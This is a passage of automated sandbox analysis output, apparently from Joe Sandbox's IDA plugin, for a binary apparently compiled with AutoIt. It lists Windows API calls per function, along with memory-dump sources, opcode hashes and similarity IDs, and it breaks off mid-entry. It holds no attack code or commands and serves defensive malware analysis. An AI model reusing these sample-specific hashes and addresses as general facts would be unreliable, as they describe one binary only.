                                    • Instruction ID: a0449fd8dee580a4e0f27ec077f383a327edc2d904845e81027002376847acc0
                                    • Opcode Fuzzy Hash: 9ebd287337c004e48786478578b194de565948c70235e9e9ac78f1571b230589
                                    • Instruction Fuzzy Hash: CB116375900508AFCF04FBA4DD86DEE77B8AF44710B148065F506A71A2EF74AE14FB51
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F59043
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F59055
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F5906B
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F59086
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 80b6bf90bd87686d06c5a3c9d0e0fa139bd3d8eebca30af5dd6a2d115ec0b41b
                                    • Instruction ID: 8cf9019866735fd2687427c3d977d9d1b74a22e2a8be2bcb33ca8994b4798db9
                                    • Opcode Fuzzy Hash: 80b6bf90bd87686d06c5a3c9d0e0fa139bd3d8eebca30af5dd6a2d115ec0b41b
                                    • Instruction Fuzzy Hash: AD115E7A900218FFDB10DFA5CC84FADBB74FB48310F204095EA04B7290D6716E54EB90
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F601FD,?,00F61250,?,00008000), ref: 00F6166F
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F601FD,?,00F61250,?,00008000), ref: 00F61694
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F601FD,?,00F61250,?,00008000), ref: 00F6169E
                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00F601FD,?,00F61250,?,00008000), ref: 00F616D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: dae0c91150d88389b9b4ab2e581de7bdaf5c3497890d1d4498f1ca08ee9162cf
                                    • Instruction ID: a1bde6d8da1b8e055359aae0de89f72ade6fe9448fea0b4d84fc3a44154a262b
                                    • Opcode Fuzzy Hash: dae0c91150d88389b9b4ab2e581de7bdaf5c3497890d1d4498f1ca08ee9162cf
                                    • Instruction Fuzzy Hash: ED113C36C0052DEBCF009FA5D948AFEBB78FF09751F494565E940F6240CB315560AB96
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction ID: bc459073827c128dcb9b519fdcdd545bc4f253754a4119915aeb7b66096d9380
                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction Fuzzy Hash: 980142B644424EBBCF226E84CC018EE3F62BF59361F548615FE1858031D236C971BF81
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00F8B59E
                                    • ScreenToClient.USER32(?,?), ref: 00F8B5B6
                                    • ScreenToClient.USER32(?,?), ref: 00F8B5DA
                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F8B5F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClientRectScreen$InvalidateWindow
                                    • String ID:
                                    • API String ID: 357397906-0
                                    • Opcode ID: 76c11ff3474f6a394f81fb204425d8fad2e9c89bc98f2c71f814915b52319106
                                    • Instruction ID: 86eaa80cf57324e6513dd95b4a3489d36fff6aac6f06c609785f8beddf49903f
                                    • Opcode Fuzzy Hash: 76c11ff3474f6a394f81fb204425d8fad2e9c89bc98f2c71f814915b52319106
                                    • Instruction Fuzzy Hash: 1B1134B5D0020DEFDB41DF99C8449EEBBB5FB08311F104166E914E2220D735AA559F50
                                    APIs
                                    • _memset.LIBCMT ref: 00F8B8FE
                                    • _memset.LIBCMT ref: 00F8B90D
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FC7F20,00FC7F64), ref: 00F8B93C
                                    • CloseHandle.KERNEL32 ref: 00F8B94E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: acccd09601285721448b639ef8f983aef0c145a6f6aef0d1bd81066d9a12dcec
                                    • Instruction ID: d4f161c8d95a8afc29a507758913d905bb685d5384575f3f27dec0fc09c72286
                                    • Opcode Fuzzy Hash: acccd09601285721448b639ef8f983aef0c145a6f6aef0d1bd81066d9a12dcec
                                    • Instruction Fuzzy Hash: 86F05EF25443197FE2107761AD86FBB3A5CEB08358F000028BA08D6192D7764900EBF8
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00F66E88
                                      • Part of subcall function 00F6794E: _memset.LIBCMT ref: 00F67983
                                    • _memmove.LIBCMT ref: 00F66EAB
                                    • _memset.LIBCMT ref: 00F66EB8
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00F66EC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                    • String ID:
                                    • API String ID: 48991266-0
                                    • Opcode ID: fab454d4c6c0e9cb6e37aa283614abb325a708c6d5c1242fd276db76721bcf2d
                                    • Instruction ID: cc1239e4575c8defec170415f936061ea870007c4d8c7b9c1d5c4eff393f818f
                                    • Opcode Fuzzy Hash: fab454d4c6c0e9cb6e37aa283614abb325a708c6d5c1242fd276db76721bcf2d
                                    • Instruction Fuzzy Hash: F4F0547A100214ABCF016F55EC85E99BB29EF45360B048065FE085E21BC739A911EBB4
                                    APIs
                                      • Part of subcall function 00F012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F0134D
                                      • Part of subcall function 00F012F3: SelectObject.GDI32(?,00000000), ref: 00F0135C
                                      • Part of subcall function 00F012F3: BeginPath.GDI32(?), ref: 00F01373
                                      • Part of subcall function 00F012F3: SelectObject.GDI32(?,00000000), ref: 00F0139C
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F8C030
                                    • LineTo.GDI32(00000000,?,?), ref: 00F8C03D
                                    • EndPath.GDI32(00000000), ref: 00F8C04D
                                    • StrokePath.GDI32(00000000), ref: 00F8C05B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: 8016e2609a299a13b2792035708a98a26b33061d6a50763c9f0add5cbaa3362e
                                    • Instruction ID: ed7a2b1b822dcc895c5f28b679aed52407b9712cf15c87f8f6cde726bbcf7aea
                                    • Opcode Fuzzy Hash: 8016e2609a299a13b2792035708a98a26b33061d6a50763c9f0add5cbaa3362e
                                    • Instruction Fuzzy Hash: 46F05E3100525DBFDB126F54AC0AFDE3F59AF05721F144010FA11A50E287755565FBE5
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F5A399
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F5A3AC
                                    • GetCurrentThreadId.KERNEL32 ref: 00F5A3B3
                                    • AttachThreadInput.USER32(00000000), ref: 00F5A3BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: 1cd886988f5527e8a7573a828165aa2902d1ef09bec32190b63240bc4be1e4e7
                                    • Instruction ID: 029357af45f3e30e945453628c40a17cf5f6b2fcc84fbd6a658d91fa4a6ced4b
                                    • Opcode Fuzzy Hash: 1cd886988f5527e8a7573a828165aa2902d1ef09bec32190b63240bc4be1e4e7
                                    • Instruction Fuzzy Hash: 98E0C93164522CBADB205BA2DC0DEE77F5CEF167A2F008225FA0995060D6768568EBA1
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 00F02231
                                    • SetTextColor.GDI32(?,000000FF), ref: 00F0223B
                                    • SetBkMode.GDI32(?,00000001), ref: 00F02250
                                    • GetStockObject.GDI32(00000005), ref: 00F02258
                                    • GetWindowDC.USER32(?,00000000), ref: 00F3C0D3
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F3C0E0
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00F3C0F9
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00F3C112
                                    • GetPixel.GDI32(00000000,?,?), ref: 00F3C132
                                    • ReleaseDC.USER32(?,00000000), ref: 00F3C13D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: 286d7b081caa3005b68542235fac5c2274a98cd0e552afbe5b943e2174d5688b
                                    • Instruction ID: ceed155263ab6ea4667e99f7e2da5e086166aa9c8bb50f84e9db61ffdce21378
                                    • Opcode Fuzzy Hash: 286d7b081caa3005b68542235fac5c2274a98cd0e552afbe5b943e2174d5688b
                                    • Instruction Fuzzy Hash: 13E06D32900648EFEB216FA4FC0D7E83B10EB05332F148366FA69980F187724994FB61
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 00F58C63
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F5882E), ref: 00F58C6A
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F5882E), ref: 00F58C77
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F5882E), ref: 00F58C7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: c3a8f457482d2641e59b10e53e866a07b7f29128025548ccee98039fe5a15ea4
                                    • Instruction ID: 7af8c20467c0da31799e195056569ab4f825962a09f30a2775401e18895d432a
                                    • Opcode Fuzzy Hash: c3a8f457482d2641e59b10e53e866a07b7f29128025548ccee98039fe5a15ea4
                                    • Instruction Fuzzy Hash: 90E04F36A422159FD7205FB06D0CBA63BA8AF547A2F154828A645D9040DA34844AAB61
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 00F42187
                                    • GetDC.USER32(00000000), ref: 00F42191
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F421B1
                                    • ReleaseDC.USER32(?), ref: 00F421D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 4a0658391422b212cd604f2f11af19dec2d52c1e830df9af6e1742620f20d341
                                    • Instruction ID: 149bf2e21c298b0e41c3ac6be4ff9de6e8bfe7c35a66471621417577a22f27f4
                                    • Opcode Fuzzy Hash: 4a0658391422b212cd604f2f11af19dec2d52c1e830df9af6e1742620f20d341
                                    • Instruction Fuzzy Hash: 00E0E575800208EFDB419F60C808AAD7BB1EF5C350F108525FD5AD7260EB788155BF40
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 00F4219B
                                    • GetDC.USER32(00000000), ref: 00F421A5
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F421B1
                                    • ReleaseDC.USER32(?), ref: 00F421D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 705ad1676b33f4eef8180a5c8b95e3a847866febbf91b045a30066af33fc87a7
                                    • Instruction ID: 10689c7e1d29e24f3587e2c274b43af67476036cb9c26e2bd666d79d25e8a5fd
                                    • Opcode Fuzzy Hash: 705ad1676b33f4eef8180a5c8b95e3a847866febbf91b045a30066af33fc87a7
                                    • Instruction Fuzzy Hash: EDE012B5800208AFCB11AFB0C8086AD7BF1EF5C310F108229F95AE7260EB789155BF40
                                    APIs
                                      • Part of subcall function 00F57652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F5758C,80070057,?,?), ref: 00F57698
                                    • _memset.LIBCMT ref: 00F79B28
                                    • _memset.LIBCMT ref: 00F79C6B
                                    Strings
                                    • NULL Pointer assignment, xrefs: 00F79CF0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$lstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1020867613-2785691316
                                    • Opcode ID: 05508d7e38aea3131168fafee41fc1d3bdbe949035032d86bdc4cf8fb0d6ae86
                                    • Instruction ID: 77ad754584e4c1ab6d61e439d3d89f2daaaf387c5a382ffcd2a7cd7c530e3986
                                    • Opcode Fuzzy Hash: 05508d7e38aea3131168fafee41fc1d3bdbe949035032d86bdc4cf8fb0d6ae86
                                    • Instruction Fuzzy Hash: AC913B71D00219ABDF10DFA4DC81EDEBBB9AF08710F20815AF519A7281DB755A44EFA1
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00F5B981
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: AutoIt3GUI$Container
                                    • API String ID: 3565006973-3941886329
                                    • Opcode ID: 8a1b456aafdae9c059022fef6f07fd3eb8106c31b6a9199f6535b2cb795ff6fc
                                    • Instruction ID: 31bcbe2f925f69e413b3b0479f1eb77bd93c0c19b2ae01fde74670588fc6c04d
                                    • Opcode Fuzzy Hash: 8a1b456aafdae9c059022fef6f07fd3eb8106c31b6a9199f6535b2cb795ff6fc
                                    • Instruction Fuzzy Hash: A3914971600601AFDB24CF24C885B6AB7E8FF48712F20856EEE4ACB691DB70E845DB50
                                    APIs
                                      • Part of subcall function 00F1FEC6: _wcscpy.LIBCMT ref: 00F1FEE9
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • __wcsnicmp.LIBCMT ref: 00F6B298
                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F6B361
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                    • String ID: LPT
                                    • API String ID: 3222508074-1350329615
                                    • Opcode ID: bac4161de45242df0142422498c39eca4e379402057966f0ffe1b2e8cee8853e
                                    • Instruction ID: d0f3877899a606649f90e3b6e1cd63e0fd056ab1f0af3dc15196b4213a33dd16
                                    • Opcode Fuzzy Hash: bac4161de45242df0142422498c39eca4e379402057966f0ffe1b2e8cee8853e
                                    • Instruction Fuzzy Hash: B8618276E00215AFCB14DF94C895EAEB7B4EF08310F11415AF946EB391DB74AE84EB50
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 00F12AC8
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F12AE1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
